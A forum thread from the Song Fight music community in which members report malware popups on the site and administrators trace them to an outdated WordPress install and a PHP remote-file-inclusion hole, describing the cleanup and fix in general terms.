Bug?
- Spintown
- Push Comes to Shove
- Posts: 399
- Joined: Fri Oct 02, 2009 9:27 pm
- Submitting as: Spintown & Company
- Pronouns: he/him
- Contact:
Bug?
For a few days I couldn't visit the Song Fight home page without something attacking my computer. Seems to be better now, but it still does it when I try to view the results from the last fight. I don't see anyone else mentioning it in here, so was it just me having problems?
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
"Without something attacking my computer" is a liiiiiiiiitle bit vague. Could you try posting a screenshot of what's happening, and maybe the page source?
- JonPorobil
- Beat It
- Posts: 5682
- Joined: Sat Sep 25, 2004 11:45 am
- Instruments: Piano, Guitar, Harmonica, Mandolin, Accordion, Bass, lots of VSTs
- Recording Method: Cubase 10.5
- Submitting as: Jon Eric, Jon Porobil, others
- Pronouns: He/Him
- Location: Pittsburgh, PA
- Contact:
Re: Bug?
Actually, Spud was just in the IRC room talking about a malware notice he got yesterday. So this is likely a known issue. Still, a little more specificity couldn't hurt.
"Warren Zevon would be proud." -Reve Mosquito
Stages, an album of about dealing with loss, anxiety, and grieving a difficult year, now available on Bandcamp and all streaming platforms! https://jonporobil.bandcamp.com/album/stages
Stages, an album of about dealing with loss, anxiety, and grieving a difficult year, now available on Bandcamp and all streaming platforms! https://jonporobil.bandcamp.com/album/stages
-
- A New Player
- Posts: 10
- Joined: Mon Sep 06, 2010 11:50 am
- Instruments: Saxophone, Keyboards
- Recording Method: Sonar 8
- Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
- Location: San Jose, Ca
Re: Bug?
I just got the malware, fake antivirus thing again at 2:23 pm. It happened when I clicked on the Beaten Man link under last week's fight. I also received it this morning when I voted.
- Paul
- Paul
- Spud
- Hot for Teacher
- Posts: 4770
- Joined: Fri Sep 24, 2004 10:25 am
- Instruments: Bass, Keyboards, eHorn
- Submitting as: Octothorpe
- Location: Seattle
- Contact:
Re: Bug?
Sorry, I was under the mistaken impression that JB had done something besides change the passwords. I have cleaned up the code tonight. Please continue to post notices of any further problems.
SPUD
SPUD
-
- A New Player
- Posts: 10
- Joined: Mon Sep 06, 2010 11:50 am
- Instruments: Saxophone, Keyboards
- Recording Method: Sonar 8
- Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
- Location: San Jose, Ca
Re: Bug?
Ugh, it just happened again. This time. when I went to the main Songfight.org page.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Spud, it would be really helpful if I could get server access again so that I can diagnose how this exploit apparently keeps happening.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
If you're running WordPress, PLEASE PLEASE PLEASE make sure that you're running the latest version of that insecure festering shitpile, because there are some pretty widespread massive exploits going on against it right now. http://blog.sucuri.net/2011/04/mass-inf ... g-com.html has a bit more information.
If you're running WordPress, PLEASE PLEASE PLEASE make sure that you're running the latest version of that insecure festering shitpile, because there are some pretty widespread massive exploits going on against it right now. http://blog.sucuri.net/2011/04/mass-inf ... g-com.html has a bit more information.
- ken
- Hot for Teacher
- Posts: 3870
- Joined: Sat Sep 25, 2004 6:10 pm
- Instruments: Guitar, bass, drums, keys
- Recording Method: MOTU 828x, Cubase 10
- Submitting as: Ken's Super Duper Band 'n Stuff
- Pronouns: he/him
- Location: oakland, ca
- Contact:
Re: Bug?
HUZZAH!!!fluffy wrote:I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
Ken's Super Duper Band 'n Stuff - Berkeley Social Scene - Tiny Robots - Seamus Collective - Semolina Pilchards - Cutie Pies - Explino! - Bravo Bros. - 2 from 14 - and more!
i would just like to remind everyone that Ken eats kittens - blue lang
i would just like to remind everyone that Ken eats kittens - blue lang
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
What, did something happen again? I thought I'd cleaned up everything and disabled the obvious points of infection.
- Spud
- Hot for Teacher
- Posts: 4770
- Joined: Fri Sep 24, 2004 10:25 am
- Instruments: Bass, Keyboards, eHorn
- Submitting as: Octothorpe
- Location: Seattle
- Contact:
Re: Bug?
Yes, pretty much every php file was infected. Linked or not, in use or not. Html was fine. I just cleaned up again. Will continue to monitor.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
fucking hell. must have been another infection I missed. The malware was VERY good at hiding itself, and I thought I found all the places it was coming up.
What was it infected with?
What was it infected with?
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Found a pretty big security hole in songpage and artistpage which is being actively exploited by people. As always it's one of those things that PHP makes WAY too easy to fuck up on. Will put in a fix ASAP.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Well, the main thing is something everyone should know about: include() and fopen() can both take arbitrary URLs as parameters, unless it's explicitly disabled in php.ini. Stupidest language "feature" EVER. My fix was to abort if it detects a :// in a key parameter.
I've audited all of the site-specific PHP and I think I fixed all the places where that could happen, but of course there's always the possibility of other stuff like that.
PHP really is a shitty language from a writing-secure-apps standpoint. Although I'd like to point out that if Songfight were database-driven rather than file-driven, it would be a lot easier to write code in a more secure way. Direct filesystem access is bad news in PHP.
I've audited all of the site-specific PHP and I think I fixed all the places where that could happen, but of course there's always the possibility of other stuff like that.
PHP really is a shitty language from a writing-secure-apps standpoint. Although I'd like to point out that if Songfight were database-driven rather than file-driven, it would be a lot easier to write code in a more secure way. Direct filesystem access is bad news in PHP.